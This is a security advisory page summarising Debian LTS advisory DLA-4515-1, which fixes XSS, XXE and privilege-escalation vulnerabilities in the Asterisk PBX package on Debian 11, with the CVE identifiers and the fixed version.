Alerts This Week
Warning Icon 1 1,146
Alerts This Week
Warning Icon 1 1,146

Debian 11 Asterisk DLA-4515-1 XSS and Privilege Escalation Risks

debian lts
Calendar Grey March 30, 2026
Dist Debian Esm H88
Discover multiple vulnerabilities in Asterisk affecting Debian 11, including XSS and privilege escalation risks.
Multiple vulnerabilities were discovered in asterisk, an Open Source Private Branch Exchange (PBX) and telephony toolkit

Summary

CVE-2026-23738

XSS vulnerability in the /httpstatus page. Cookie names/values and GET
parameter names/values are rendered without HTML-escaping, allowing
reflected cross-site scripting attacks. The status page is now also
disabled by default.

CVE-2026-23739

XXE injection vulnerability in xml.c. The XML parsing functions allow
external entity processing which can be exploited for XML External Entity
injection attacks via network-based entity resolution.

CVE-2026-23740

Privilege escalation via ast_coredumper gdbinit file permissions. The
script creates temporary files with default umask permissions, potentially
allowing local users to read or tamper with sensitive debugging data.

CVE-2026-23741

Privilege escalation via ast_coredumper sourcing configuration files
without ownership or permission checks. When running as root, a non-root
user could place a malicious config file that gets sourced with root
privileges.

Read the Full Advisory


Severity
important
Lowest
Low
Medium
High
Critical

Package: asterisk
Version: 1:16.28.0~dfsg-0+deb11u9
CVE ID: CVE-2026-23738 CVE-2026-23739 CVE-2026-23740 CVE-2026-23741
Debian Bug: 1127438

Get the latest News and Insights

Get the latest Linux and open source security news straight to your inbox.

Your message here